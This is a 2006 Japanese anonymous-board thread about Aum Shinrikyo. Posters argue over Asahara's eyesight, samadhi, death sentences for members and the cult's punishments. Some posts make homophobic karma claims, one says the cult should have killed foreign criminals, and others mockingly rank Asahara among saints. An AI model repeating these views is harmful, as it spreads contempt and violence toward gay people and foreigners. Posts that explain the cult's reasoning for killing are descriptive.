http://upload.fam.cx/cgi-bin/img-box/m1e61014152230.jpg

それとサマディの呼吸停止と心臓停止のソースを頼みます。


577 :名無しさん@3周年:2006/10/14(土) 15:28:33 ID:5yWmGMNg
オウムにきて、習うことといったら、事件正当化のための
理論武装であって、
本来仏教を知りたい人が知るべき教えなんて、何分の一だろう、ばかばかしい

それから、ふと思ったんだが、教祖はムショにつっこまれてから
本をいくつか取り寄せた、って聞いたんだけどなんのために?
目がみえないのに、、
誰か読んでくれるのかしら

578 :名無しさん@3周年:2006/10/14(土) 15:30:04 ID:5yWmGMNg
もしかして、目が見えない振りをしていた?


579 :名無しさん@3周年:2006/10/14(土) 15:30:09 ID:dm92B+p+
チヅオは片目は視力0.5あったらしいよ。

580 :名無しさん@3周年:2006/10/14(土) 15:32:50 ID:oGlsVKvm
俺は裸眼で両目とも0.02以下・・・
そもそも獄中ノートがかけるくらいだからな・・・

581 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 15:37:36 ID:p7gM8nmZ
>>575

ああ。
きっとモテるタイプなんでしょうねw
俺はもう40近いから枯れかかってるってのもあるかもw


>>576

なんとなくその写真の内容は想像がつくので開かない。
そういう態度で聞いてくる方に何も示す義理はないと思うので自分で勝手に調べてください。



582 :名無しさん@3周年:2006/10/14(土) 15:37:58 ID:wH02KmXD
麻原のおっさん地獄の中でも、麻原のおっさんは目が見えてたって記述があるよ。

583 :名無しさん@3周年:2006/10/14(土) 15:42:39 ID:z5c16lR9
>>556

うるおぼえだけど、、、

前スレ
”……あなた方へのアドバイスは、、、”
”……真理がけがれる!”


584 :名無しさん@3周年:2006/10/14(土) 15:42:46 ID:dm92B+p+
>>581
僕と年あまり変わりませんよ。最近は朝立ちも少なくなりましたし。
何故か女には、まったくモテないのですよ。
これもカルマなんですかねw

585 :名無しさん@3周年:2006/10/14(土) 15:43:22 ID:oGlsVKvm
>>581
そういう態度とは心外です。
俺もゲイの一人としてこういう写真を提供しているだけですよ。
ゲイを馬鹿にする意図でやってるわけではないですよ。
ただ、喜んでくれたらそれでいいと思って貼ったんですが・・・。
シヴァの喜びさんは素晴らしい方ですよ。

586 :名無しさん@3周年:2006/10/14(土) 15:47:14 ID:dm92B+p+
シヴァの喜びさん、貼られた画像は若いイケメンです。
顔以外なら、私といい勝負。

587 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 15:47:19 ID:p7gM8nmZ
>>585

すまない。
言葉がキツかった^^;
ちと最近の現役と思われる方々の攻撃に正直辟易としてたものだから^^;

ソースについては少し待って。
自分の持ってる本の中にそういうデータが書かれたものがあったはず。
あとはメディカルデータは無いけどパイロットババジーのHPに彼が行った100回以上の
公開サマディの基本の3種類の説明があって、その時間数も書いてあったりします。



588 :名無しさん@3周年:2006/10/14(土) 15:49:08 ID:fzvH0Dp9
何だ、お前もホモか。
道理で、ヘタレなわけだ。

589 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 15:52:12 ID:p7gM8nmZ
>>583

その言葉はグルになろうと思って言ったものではないですよ^^


590 :名無しさん@3周年:2006/10/14(土) 15:52:40 ID:oGlsVKvm
>>588
同性愛をどう思おうが勝手ですよ。
大きいオッパイが好きな人もいれば小さいオッパイが好きな人もいる。
対象を限定して批判するのは何かの執着や囚われがあるからですよ。
俺がヘタレな理由を聞こうじゃないか?

591 :名無しさん@3周年:2006/10/14(土) 15:56:36 ID:z5c16lR9
>>589
いえ、問いに対しての回答です。
この人をどう思ったかな、、。

592 :名無しさん@3周年:2006/10/14(土) 15:57:56 ID:dm92B+p+
俺は顔が女受けしないんだよな。。

593 :名無しさん@3周年:2006/10/14(土) 16:00:44 ID:wH02KmXD
それなら心で勝負しろっ

594 :名無しさん@3周年:2006/10/14(土) 16:01:39 ID:oGlsVKvm
俺は若い頃から精神世界に興味はあったが今ひとつ信じきれない部分があった。
最近シヴァさんの書き込みを見て、もしかしたら解脱やサマディは
本当に存在するんじゃないかと思ってきたところ。
超能力関係の本も)腐るほど読んだが神通みたいのは何一つつかなかった・・・
さっき書いたように俺はゲイでもあり、精神世界や超能力に興味ありで
孤独なわけですよ。修行の時間だけはありあまっている。
インドの聖者のサマディが本物だったらヨーガを始めるかもしれません・・・



595 :名無しさん@3周年:2006/10/14(土) 16:02:21 ID:rFfyMxCe
>>588
黙ってろ。腐れ現役。
価値基準がそこにしか存在しないナルコ脳症が。
てめーの腐った粗チン切り落としてから相手の性をうんぬんしやがれ。
できもしねーのに寝言吐かすな。麻原盲信変態めが。

596 :名無しさん@3周年:2006/10/14(土) 16:03:58 ID:fzvH0Dp9
ホモの傾向は、人間を物質として見る傾向があるね。
なぜか、社会救済をしたがるのは不安定だから。
まぁ、女を利用したか、愛さなかったカルマがある。
素直になって、懺悔して、騙されて、利用される事を恐れてはいけない。
本当の強さが、恐怖で出てこれなくなってる状態です。
自分を救うには、自分しかなく、私は因果だと思うね。

597 :名無しさん@3周年:2006/10/14(土) 16:08:14 ID:oGlsVKvm
>>596
それは違いますね。男の中にも女心があるようにその逆も存在する。
俺は男だが自分の中に女(母性)としての意識を感じるときがある。
性の認識エネルギーが男か女かというだけの話でしょう。

598 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 16:09:11 ID:p7gM8nmZ
>>591

それはパモーチャナさん(この名前だっけ?)をってこと?
ごめん。仕事の時間が迫ってるもんだから焦っていまいちコメントの意味を掴みかねてる^^;


599 :名無しさん@3周年:2006/10/14(土) 16:14:39 ID:z5c16lR9
>>598前スレ
”……あなた方へのアドバイスは、、、”
”……真理がけがれる!”

全部は覚えてないけどこの対話をしたときに
556の質問の答えを得たのではないですか?ということです。

600 :名無しさん@3周年:2006/10/14(土) 16:15:15 ID:fzvH0Dp9
男性になるか、女性になるか?
女性に成りたければ、素直にしていればいい。肉体と矛盾するが(レイプのカルマ)
男性になりたいなら、
女性の弱さ、恐怖を経験するしかないと思う。
カルマが切れれば、男性としての復活のもありうると思う。
ナチュラルの男性や女性の中にも、異性の要はあるが、それをもっていてもなんら
正常としているのは、異性を愛したからだと思う。

601 :名無しさん@3周年:2006/10/14(土) 16:15:18 ID:dm92B+p+
男は年とともに、女性化し
女は年とともに、男性化するね。

602 :名無しさん@3周年:2006/10/14(土) 16:16:51 ID:5yWmGMNg
教組は完全に失明した、って教団の本には書いてなかったっけ?
結局どうなのよ?
片目が0.5あれば、そんなに困らないジャン

私も近眼ひどくて、両目あわせても、0.1ないくらいなのに
どう違うのかね
しかも、割と最近、週刊誌でアチャリにインタビューしたものが
あったけど、アチャリのいうのには、教組は左眼?が義眼を入れているって、、
本当なの?
だって、眼球が無いわけじゃないでしょうよ
誰かが、非常にいい加減じゃないかしら



603 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 16:20:04 ID:p7gM8nmZ
>>594

いつか縁があったら俺の教室においで。今はまだ明かせないけどHPで連絡方法とか
示すよ。
気にいればやればいい。

>>597
>ホモの傾向は、人間を物質として見る傾向があるね。なぜか、社会救済をしたがるのは不安定だから。

それじゃ君のことだね。
君は相手を物質としてしか見られない傾向があるんだね。だからそうやって簡単に切って捨てようとする。
自身が不安定だから相手を切って捨てて優越を感じて自分を安定させたいんだ。


>まぁ、女を利用したか、愛さなかったカルマがある。素直になって、懺悔して、騙されて、利用される事を恐れてはいけない。

そっくりそのまま返してあげるよ。
君自身にそのカルマと傾向があるから相手をそういう目でしか見れない。
それゆえに相手に「素直になれ」とか「懺悔しろ」とか「利用されるのを恐れてはいけない」とか言うのだね。
相手を利用したいから。

>本当の強さが、恐怖で出てこれなくなってる状態です。自分を救うには、自分しかなく、私は因果だと思うね。

こんな偏見の目がある中で自分がゲイだと言える人間のどこに恐怖と本当の強さがないと?
俺なんか本名まで言われてるよw
君は相手に自分の弱さを投影して、そうであること望み、強要してるのに過ぎない。
弱いのは君だと知れ。
自分を救うのは結局自分。それは異論がない。
ならば相手の性にまで口を挟むのはよしたまえ。それは結局自分が優位に立ちたいだけの弱い心。




604 :名無しさん@3周年:2006/10/14(土) 16:20:55 ID:dm92B+p+
聞くところによると、無性愛者っていう男性にも女性にも
性愛を持たない人が少しだけいるそうだね。
こういう人は、ある意味幸せかもしれない。

605 :名無しさん@3周年:2006/10/14(土) 16:21:57 ID:oGlsVKvm
パイロット・ババはヨガは科学であるといってますな。
自己実現の科学であり、自己発見の科学。
でも最近の人は確かにヨガはエクササイズ程度にしか思ってない。
シヴァさんの所に来る人もエクササイズが要ですか?
その先にある解脱は別の話?

606 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 16:22:48 ID:p7gM8nmZ
>>599

ふむ。
なるほど・・・
少し考えさせて。前スレの内容も見ながら再考します。

607 :名無しさん@3周年:2006/10/14(土) 16:24:15 ID:fzvH0Dp9
馬鹿な女を利用するには、権力が一番。つぎに、綺麗に見せたければ、社会救済
を唱えるのが一番。
女は何て素敵な人だと自分のために、騙されているのも知らず動いてくれる。
冷たい男だったのさ。

608 :名無しさん@3周年:2006/10/14(土) 16:24:40 ID:5yWmGMNg
どなたか、ご存知ない?
ムショに入ったくらいの時点で、完全に失明していた あるいはすこしでも
見えていた

ノストラダムスだっけ?
預言書に、救世主は、盲目だか、片目だって、記述があったというのね
教団の見解では、そうだったよね
(その文が本当にあったかどうかすら、私はしらない、ノストラダムス読んだこと無いから)
だから、盲目を演じたがっていたって、可能性は?

だって、ムショで本を取り寄せたんでしょう?
誰かに音読させるため?

609 :名無しさん@3周年:2006/10/14(土) 16:28:46 ID:dm92B+p+
麻原は絶対見えていたはず。
片目だから、疲労のため視力は落ちていたとは思うが。
ダキニは若いコケティッシュな女ばかりだし。

610 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 16:32:56 ID:p7gM8nmZ
>>600
>男性になるか、女性になるか?女性に成りたければ、素直にしていればいい。

却下。
女性の方が強情だったりします。この段階であなたの論は崩れている。

>肉体と矛盾するが(レイプのカルマ)男性になりたいなら、 女性の弱さ、恐怖を経験するしかないと思う。

却下。
女性の方が真の意味では強い。あなたは女性の本当を見えていない。女性蔑視の発言。

>カルマが切れれば、男性としての復活のもありうると思う。

却下。
男性がまるで偉いとの発言。どっちも平等です。
まあ、「肉体的に」解脱に有利か有利で無いかを問われると若干女性は不利だけど、
解脱できないわけではない。

>ナチュラルの男性や女性の中にも、異性の要はあるが、それをもっていてもなんら
正常としているのは、異性を愛したからだと思う。

却下。
たんに欲望のベクトルの違い。
異性と同性。そこにしか判断の基準がないからこんな下らない論を展開することになる。



611 :名無しさん@3周年:2006/10/14(土) 16:35:40 ID:dm92B+p+
>>610
女性の方が強情だったりします。

確かに。

612 :名無しさん@3周年:2006/10/14(土) 16:38:31 ID:fzvH0Dp9
芝の論理は、単純な平等論だとおもいます。
麻原肯定ですな。

613 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 16:38:53 ID:p7gM8nmZ
>>605

いえ。
解脱目的の方もいますよ^^
その内容を前面に押し出していた訳ではないのですが、やはり気がつくものがあったらしくて
その部分を集中的に聞いてくる方がいますw

>>607
>馬鹿な女を利用するには、権力が一番。つぎに、綺麗に見せたければ、社会救済
を唱えるのが一番。
女は何て素敵な人だと自分のために、騙されているのも知らず動いてくれる。
冷たい男だったのさ。

それが君の見解だね。つまり君の潜在意識にある女性の見方。
知ってるかい?
同性愛者の方が女性と仲良くなれるって。
女性に下心が無いし、利用しようと思ってないから・・・それが女性にも伝わるから。
女性を利用しようとした冷たい男だったのならばその心の傾向はどこに行ったのかね?


614 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 16:40:57 ID:p7gM8nmZ
>>612

いえいえ^^
麻原は女性蔑視でしたよ^^
女性はカルマが汚れてる、エネルギーが汚れてる・・・数々の発言をしてます。

だから俺の論は彼の論と根本を異にします。


615 :名無しさん@3周年:2006/10/14(土) 16:42:35 ID:fzvH0Dp9
ホモに聞けよ。演技してんだろうよ。


来世、ホモだろうの人間がいなくも無いがね。

616 :名無しさん@3周年:2006/10/14(土) 16:43:22 ID:dm92B+p+
>>613
確かに、女性にゲイバーが人気あるらしいですね。
話しが面白いって言ってましたよ。

617 :名無しさん@3周年:2006/10/14(土) 16:45:39 ID:5yWmGMNg
教組の長兄と五男が、最初は見えていたけど、全盲になったんだと
だから、教組も同じ病気だったから
見えなくなっても不思議は無いんだけど

でも、教団立ち上げのときは見えていて
シャクティパットのやりすぎで完全に失明ときいた
てことは、イニしなくなれば、エネルギの回復ってのはありえるから
見えるようになっても、不思議はないのかもしれない

でも、ビデオとかみると、教組の目は、見える人のそれでないような
感じはした
目が動かないというか、、関係ないほうを見ている


618 :名無しさん@3周年:2006/10/14(土) 16:47:58 ID:fzvH0Dp9
まったく、コッテ牛のごとく突進してきやがって・・・・

619 :名無しさん@3周年:2006/10/14(土) 17:10:16 ID:dm92B+p+
>>617
でも、麻原は詐病癖あるからねぇ。
肝臓癌、Q熱リケッチア、
見えていないとしたら、女を見る目に信頼のおける側近に、
ダキニを選ばせてたのかも?

620 :名無しさん@3周年:2006/10/14(土) 17:13:04 ID:kN4oIN5G
このスレにいる現役の方へ 聖者マハー・ケイマ最上善逝の陳述より 
 
私が満たされたと信じていたものは、私の自我を解体し、そそぎ込まれた麻原の妄想なのだ、
彼は真の宗教者ではない、グルでもない、オウム真理教の教養は間違っているとわかった時、
肉体の死とは別の死を体験しました。

私は今、はっきりと、また、何度でも言い切れます。オウム真理教は間違っていた、
教祖も教義も真の宗教とは言えないものだったと。そして私自身、一○数年間の自分の人生を否定し、
間違っていたことをここで述べる勇気を持てました。

私は一○数年のカルトでの体験を伝え、まず、身近な人から本当の宗教とそうでないものを見分けるには
どうすべきか、この教祖も教義も間違っていることを伝えたいと思っています。


621 :名無しさん@3周年:2006/10/14(土) 17:20:16 ID:fzvH0Dp9
ニュース番組で、おっさんが、魂入れなきゃなんないといっていた。
魂って何ですか?質問に、
悪いことをしない、お天と様の下を歩けないことをしないとか、
・・・いっていた。
いい年こいたおっさんが、恥ずかしくないのかと思った。
魂、抜かれてんなぁーこのおっさんとおもった。

622 :名無しさん@3周年:2006/10/14(土) 17:27:22 ID:nzEiykoD
だかんさあ、教組の目の状態について
はっきり述べられる人っていないの?
結局それも、解脱と同じで、自己申告なのかしら?
教組が見えないといえば見えない?


623 :名無しさん@3周年:2006/10/14(土) 17:29:54 ID:wH02KmXD
>>617
麻原のおっさん地獄を読んだんじゃなかった?
説法してる時と、一部の幹部に話をしてる時じゃ目線が違うって書いてあったよ
見える人の目線だって。
あとメモをサラサラッと書いて渡したとかも書いてなかったかな。
見えてるって確信したって。

624 :名無しさん@3周年:2006/10/14(土) 17:31:53 ID:1+wyIhK6
ホモのセックス、
想像したらビジュアル的には、
美しくないな。

でも、ホモの人はそれが美しいと思うのだろうか?

625 :名無しさん@3周年:2006/10/14(土) 17:35:49 ID:nzEiykoD
義眼を入れているって、知っていた?
アチャリに独占インタヴュした週刊誌が、そう書いていたんだけど、、

626 :名無しさん@3周年:2006/10/14(土) 17:38:17 ID:LaFDRchL
>>516
もう少し基本的な科学を勉強したほうがいいようだね。
人体から電磁力って、どのような原理で電磁力が発生するというわけ?
たとえ人体から電磁力が発生したとして、一体何に対して反発して浮くというのでしょうか?
もしその電磁力とやらで浮くようだったら、地球上のエネルギー問題すべて解決していますがな。

>>機械で作り出した強力な電磁力で人間が浮くことは実験でも証明されてるし、

電磁力は機械では作り出せませんよ。
電磁力で人体が浮くということであれば、超伝導体の上に人間が乗って下に置いてある磁石の
反発で浮くというのはあったけど。

麻原の空中浮揚に関しては当時週刊誌の取材でカメラマンが撮影したらしいんですが、
そのカメラマン氏が言うには、膝で飛んだんじゃねーのと思われるでしょうが、
もしそうだとしてもふんわりとは着地できないでしょう、と何かのコラムで書いていた。
つまり麻原は「どすん」とではなく、ふんわりと着地したらしい。本当か。

627 :名無しさん@3周年:2006/10/14(土) 17:52:08 ID:fzvH0Dp9
今の社会に興味を持つなら、誰もが、がんばれば富を取れる時代、自分を
殺せる人間が、本当に自分と矛盾しながら生きていくことになるだろうね。
実際、私は、この社会に何の興味も無かった。
彼女がいて、暮らしていければなぁ。ぐらいにしか思った事がない。
リアルでは、私の話しを聞く人は数人の友人位だった。
阿佐ヶ谷には馬鹿にされ続け、教団では、闇信徒だった。
いつしか、しゃべるのがマンドクサクなっていた。


628 :名無しさん@3周年:2006/10/14(土) 18:15:05 ID:X/J8CEhW
シヴァの喜びさんへ
ババジ系のヨーガの本で日本で出版されている本ってどんなのがあるんでしょうか?
よければお教えください。

629 :名無しさん@3周年:2006/10/14(土) 18:33:35 ID:kN4oIN5G
http://pilotbaba.jp/
パイロットババ公式ウエブさいとというのはここにあるぞ。

630 :名無しさん@3周年:2006/10/14(土) 18:34:50 ID:kN4oIN5G
「ヒマラヤへの扉」4725円 税込 (本体価格4500円)
http://www.jswork.jp/syoten/bookview.asp?bookno=102834
これじゃまいか?

631 :名無しさん@3周年:2006/10/14(土) 18:35:41 ID:JSIF5J7B
>>622
完全に見えなくなった時期と、
弱視で見えていた時期が交互に何回かあるというのが正解。
完全に見えなくなっていた時期は、
トイレにいくのも壁伝いに歩いていたから間違いない。
その後、また弱視に回復したようです。

632 :名無しさん@3周年:2006/10/14(土) 18:50:31 ID:nzEiykoD
弱視だったときは、たとえば眼鏡をかければ、本くらい読めたのかね

預言書の盲人を気取って、視力が回復しても黙っていたの?
信者はほとんど、ある時期以降は、教組は失明したと思わされていたと
思ったけど、、


633 :名無しさん@3周年:2006/10/14(土) 19:00:29 ID:JSIF5J7B
視力が回復したのは、
逮捕前にサティアンにこもって(隠れて)いたとき。
逮捕されてから、さらに視力が回復したと思われる。

シャクティーパットで視力がなくなってくるのは本当。
視力を一時的には完全に失っていた。
その辺のシャクティーパットの厳しさは、
シヴァナンダさんも理解しているはず。

シヴァナンダさんは、
尊師がどういう気持ちで、
何を動機として、シャクティーパットを行っていたと思うの?
聞いて見たい。


634 :名無しさん@3周年:2006/10/14(土) 19:03:57 ID:fzvH0Dp9
見えようが、見えまいが興味がないんだろ。

635 :名無しさん@3周年:2006/10/14(土) 20:15:43 ID:Joxf/W60
視力がなかったから、異常な世界に浸りきるようになったんだろうね。

636 :名無しさん@3周年:2006/10/14(土) 20:33:12 ID:kN4oIN5G
このスレにいる現役の方へ 聖者マハー・ケイマ最上善逝の陳述より 
 
私が満たされたと信じていたものは、私の自我を解体し、そそぎ込まれた麻原の妄想なのだ、
彼は真の宗教者ではない、グルでもない、オウム真理教の教養は間違っているとわかった時、
肉体の死とは別の死を体験しました。

私は今、はっきりと、また、何度でも言い切れます。オウム真理教は間違っていた、
教祖も教義も真の宗教とは言えないものだったと。そして私自身、一○数年間の自分の人生を否定し、
間違っていたことをここで述べる勇気を持てました。

私は一○数年のカルトでの体験を伝え、まず、身近な人から本当の宗教とそうでないものを見分けるには
どうすべきか、この教祖も教義も間違っていることを伝えたいと思っています。

637 :オウム解読:2006/10/14(土) 21:12:45 ID:Ycop+CqH
シヴァの喜びさん、本当にご苦労様です。
最近、読ませてもらっているのですが、いやー、シヴァさんのエネルギー、一体、
どこから、湧いてくるのでしょうか。素晴らしい!!の一言ですねえ。敬服します。
頑張ってください。

麻原教祖の裁判打ち切りについて、これではオウム事件の真相が解明されないままに
終わるではないか、という批判に対して、江川紹子さんは、「WILL」11月号に
反論を書かれていますね。これからいくら続けても、教祖の口から語られることはな
いだろう。これまでの裁判でも、かなりのことが解明されている。あとは、われわれ
関心を持っている人間、又、関係者が、オウムの深層を解明、究明していかなければ
ならないのだ、と。私も、この江川さんのご意見に賛成ですが、ただ、問題は、オウム
事件での死刑の人間がちょっと多すぎはしないか、ということです。死刑は、教祖一人
でいいのではないか、と思うのですが・・・・。

シヴァの喜びさんはいかがお考えでしょうか。

638 :名無しさん@3周年:2006/10/14(土) 21:15:53 ID:fzvH0Dp9
目が見えていたら、もっとうま生きたわい。

639 :名無しさん@3周年:2006/10/14(土) 21:49:01 ID:kN4oIN5G
他にも11人が死刑判決を受けてるからな。ちょっと多すぎる気はするが…


640 :名無しさん@3周年:2006/10/14(土) 22:03:27 ID:kN4oIN5G
しかし元アングリマーラ(岡崎)さんは死刑が確定してるし…坂本さんに関わってる
人はちょっと厳しいな。サリンを撒いたひともやっぱり難しいのかな…空しい…


641 :名無しさん@3周年:2006/10/14(土) 22:30:01 ID:dm92B+p+
人間は平等って言うけど
弁護士のような社会的地位の高い人を頃すのと
そうじゃない人を頃すのとは
刑罰が違ってくると思う。
オウムが頃したのは、まともな人ばかりだから
情状酌量の余地はないよ。
外国人強盗団とか窃盗団なんかを頃してたら、
逆に正義の味方だったのに。

642 :名無しさん@3周年:2006/10/14(土) 22:41:13 ID:teoeddvu
死んだ人の数とつりあいをとるためにはもっと死刑にしないと合わない

643 :名無しさん@3周年:2006/10/14(土) 23:02:21 ID:wg5ZdY9a
でも、教組に、にらまれた人、こいつを使おうと教組が意図した人ってのは
もう死ぬ以外なかったわけよね

誰でも、グルを尊敬していて一心不乱に信じていた人は、殺人のお鉢が
回ってきた可能性があったと思うよ
その人が特別悪人だから、死刑になった、とは思いにくいんだよね、、
教組に言われれば、そうなったというだけ、、
なんなのかわかんないよね

単純に、医師免許があるとか、車の運転がうまいとか
武術に秀でていたってだけで、殺人に関わっている
シーハとか、会ったことがあるけど、ほんと明るくて、楽しいことが好きそうな
(公判でも、アホらしいことばかり言って、切実味がない、、)
単なるお兄さんで、
悪いことなんかするようなタイプじゃ、絶対無かったと思う
ただ、武道をやっていて、腕っ節が強かったってだけで
新見から(あなたは強いから同時に4人くらいやっつけてください)とか
言われたみたいだし、、
ただ、修行に興味があった、教組に傾倒したってだけで
誰だって、ああなる可能性があった



644 :名無しさん@3周年:2006/10/14(土) 23:03:18 ID:svHaeUcX
尊師に国民栄誉賞受賞を推薦したい、ダメでしょうか?

王貞治− 古賀政男 − 長谷川一夫− 植村直己
−山下泰裕−衣笠祥雄−美空ひばり−千代の富士
−藤山一郎−長谷川町子−服部良一−渥美清
−吉田正−黒澤明−高橋尚子−麻原彰晃


645 :名無しさん@3周年:2006/10/14(土) 23:07:21 ID:wg5ZdY9a
新見ですら、ハルマゲドンがくる、と本気で信じていたせいで
人殺していたみたいじゃない?
ここ一年かそこらの間だったよねえ?
ヴァジラヤナの救済は失敗しましたとか、ミラレパが言ったの、、

あれって、ハルマゲがくるくる、って信じていたのが来ないんで
どうも、予言が外れたらしいとか思って、
そう発表したんじゃないかと、思うんだけど
もしそうなら、(ハルマゲドンがくる、)って吹き込んだ奴にだけ
本当の罪があると思うんだよね、

だって、世間の人が聞いたら、バカバカしいだろうけど
ハルマゲドンがくる、日本は壊滅的な状態になる 
それ以前に済度しないと、救済できない、って言われて信じ込んで
(悪意がないのに)殺したとしたら、
誰が悪いって、変な予言する奴が悪いんで、、

646 :名無しさん@3周年:2006/10/14(土) 23:08:25 ID:dm92B+p+
(゚д゚)、ペッ

647 :名無しさん@3周年:2006/10/14(土) 23:11:39 ID:d+OSWIum
>シヴァの喜びさん

この場合男に限っての話だけど、
ホモに対して差別的な意識を持っている男って、
女性に対しても差別的な考え方してないっすか?

648 :名無しさん@3周年:2006/10/14(土) 23:16:29 ID:AyHrFtRm
聡明であれば予言に何らかの疑問を感じた筈。
愚かな者が上からの情報を100%受け入れ愚行に走った。
己のなした行動に全く責任が無いというのは誤り。

649 :名無しさん@3周年:2006/10/14(土) 23:17:38 ID:dm92B+p+
新見なんて、娑婆に出ても村井みたいに殺されるのが落ちだよ。
素直に死刑になった方がいいんだよ。
頃す相手を間違ったんだよ。
市民を困らす、警察も手に負えない、外国人犯罪者を頃すべきだったかもな。
カルマの悪さだったら、日本人の比じゃないだろ。
奴らだって、目的の為なら平気で頃すんだし。
似た者同士、好敵手だろ。

650 :名無しさん@3周年:2006/10/14(土) 23:18:49 ID:kN4oIN5G
ガフバなんかも格闘技好きの良い奴だったけどな。
坂本事件もサリンも関わってるし死刑は免れないんだろうな。

651 :名無しさん@3周年:2006/10/14(土) 23:22:26 ID:kN4oIN5G
イシディンナも結構ぶっきら棒だが悪い奴じゃなかった。
サンジャヤもV・パーニもほんと良い人だった。

652 :名無しさん@3周年:2006/10/14(土) 23:23:52 ID:AyHrFtRm
>>650-651
でも智慧の光が足りなかった?

653 :名無しさん@3周年:2006/10/14(土) 23:24:36 ID:svHaeUcX
世界5大聖者
イエス・キリスト(イスラエル)
釈迦(インド)
孔子(中国)
ソクラテス(ギリシャ)
麻原彰晃(日本)

654 :名無しさん@3周年:2006/10/14(土) 23:25:56 ID:kN4oIN5G
>>652 殆どのサマナが教祖の命令だったらサリン撒いてたと思うぞ。その当時はね…

655 :名無しさん@3周年:2006/10/14(土) 23:28:01 ID:dm92B+p+
>>653
クイズ・ダウトを探せかよw

656 :名無しさん@3周年:2006/10/14(土) 23:28:24 ID:svHaeUcX
日本八大聖者

親鸞
空海
最澄
法然
道元
日蓮
良寛
彰晃



657 :名無しさん@3周年:2006/10/14(土) 23:28:34 ID:AyHrFtRm
>>654
でもその行動を選択決定するのは最終的には本人なんだからね…

658 :名無しさん@3周年:2006/10/14(土) 23:34:07 ID:AyHrFtRm
逆さ吊りって結構きついんですか?

659 :名無しさん@3周年:2006/10/14(土) 23:39:06 ID:svHaeUcX
近代5大聖人

ダライラマ14世テンジンギャツオ
マザーテレサ
ラーマクリシュナ
サティア・サイババ
麻原彰晃

660 :阿佐谷北本人:2006/10/14(土) 23:39:07 ID:SkfbKbzD
>>653 

 殺された人のことは言及無しか? 君たちはお遊びが過ぎるよ。

661 :名無しさん@3周年:2006/10/14(土) 23:42:47 ID:dm92B+p+
2ちゃんねる聖者登場w

662 :名無しさん@3周年:2006/10/14(土) 23:47:52 ID:kN4oIN5G
>>658 1時間くらい逆さ釣りの経験あるけど、縛り方によっては最初足が痛いんだけど
そのうち慣れてくる、あと途中で意識が飛んだ。あんまりやり過ぎないほうがいいぞ。


663 :名無しさん@3周年:2006/10/14(土) 23:50:11 ID:dm92B+p+
>>662
性欲の破戒したから?

664 :名無しさん@3周年:2006/10/14(土) 23:53:19 ID:AyHrFtRm
>>662 罰として何時間も吊られた人もいるんでしょ?
他にも恐ろしい罰はありましたか?蓮華座地獄とか…

665 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 23:54:39 ID:p7gM8nmZ
>>647
亀レスすいません。

>この場合男に限っての話だけど、ホモに対して差別的な意識を持っている男って、
女性に対しても差別的な考え方してないっすか?

彼らには「嫌悪」と「優劣」が意識の背後に潜んでいると思うんだけど、「男」が優れているっていう悪見解があるのだと思う。
だからそうでないものを蔑む。つまり自分は「優れている」相手は「劣っている」だから「嫌悪」する。
ということは自分以外の性は「劣っている」のだから・・・当然女性にも差別的な意識を持っている・・・
と俺は思う。で、実際そういう例を多く見てきてるし、ほとんどがそうだった。

あるいは、相手が理解できなくて「嫌悪」そして「差別」するタイプがいますが、この手のタイプも女性を
理解できなくて「嫌悪」します。
理解できないものは「悪しきもの」と判断するから。あるいは「劣ったもの」と判断するから。


666 :名無しさん@3周年:2006/10/14(土) 23:55:31 ID:kN4oIN5G
>>663まぁそんなとこだよ。(f^^)
何の効果があったんかな。いまだに分らん。ヨガで逆さづりにする
修行あるの?昔魔術か何かの修行で3日3晩木の枝に逆さづりになる修行の事が
書いてあったな。

667 :名無しさん@3周年:2006/10/14(土) 23:57:42 ID:wg5ZdY9a
657
それは、そんな発言ができるのは、オウムじゃなかったからだ、と
思うよ
もちろん、同じオウムでも、かなり洗脳に個人差があったと思うけど
まず、教組には、ある程度、超能力と呼べるようなものがあり
それを常時見せられていた弟子としては
(ある魂の過去の行い、カルマ、輪廻)っていう
確めようのないテーマを出されると、
どうしても自分で判断がつきにくかったわけ、、

たとえば、自分も修行が好きでしているけども、自分にはまだない
すごい神通が教組にはあったとして、
それを常時みていると、(このグルの言うことは、何でも正しいに違いない
自分は確められるステージにないけど、教祖は自分より力がある)と
思うと、自分の判断よりも、グルの判断のほうが、正しいだろうと
、、
まだ自分は、修行が未熟だから、自分で判断するより、グルの判断のほうが
正しいだろうと、、そう思って、殺したほうがためになると、
言われると、してしまうという
それは、内部にいた人間じゃないと、わからないと思うよ

普通の常識のことじゃなく
過去セでその人が何をしたとか、そういう(証明ができないこと)がテーマなんで
自分の判断に自信がもてなくて
教組のを鵜呑みにしてしまうわけ

668 :名無しさん@3周年:2006/10/15(日) 00:02:02 ID:YOotLzB9

 ば ど ら ー



669 :名無しさん@3周年:2006/10/15(日) 00:03:59 ID:KlIlJ/IL
漏れのもどきが言うんだけど、、
ぱもは教団の金使い込んでいられなくなったんだと

670 :名無しさん@3周年:2006/10/15(日) 00:04:39 ID:x6vxGTL8
バドラーはお手つきになったって本人がマスコミで話してなかったっけ?

671 :名無しさん@3周年:2006/10/15(日) 00:08:19 ID:/N5hSXjV
知っているかどうかしらんけど
オウムでは輪廻ってのを肯定する
すると、現代でもそうだけど、生き物を殺すとか、人を殺すって人は
たくさんいるわけ
で、なしたことは必ず自分に返るって法則だから
その人が過去にした、生き物を殺した傷つけたカルマってのは
いつかはその人が、痛い思いをして清算しないといけないと、、

なぜなら、生き物を殺した殺生のカルマが溜まりすぎると地獄に落ちると
言われているわけよ 
で、殺生のカルマが溜まりすぎる以前に、少し痛い思いをさせてやったほうが
悪いカルマが落ちて、地獄に落ちにくくなると、、そう常々教えられていると

すると、教組があいつはカルマが悪いから、痛めつけてカルマを落としたほうが
ためになると、いうと、そうかもしれないと、思ってしまうわけ
なんでなら、ある程度の神通というのを、教組はもっていたから
信用しているわけよ、、

で、その思想に固められてしまった人が、人を殺すってのは
外部が見たほど、凶悪な気持ちで殺しているんじゃないわけ
このほうが、相手のためにも、全体のためにもいいはずだ、と
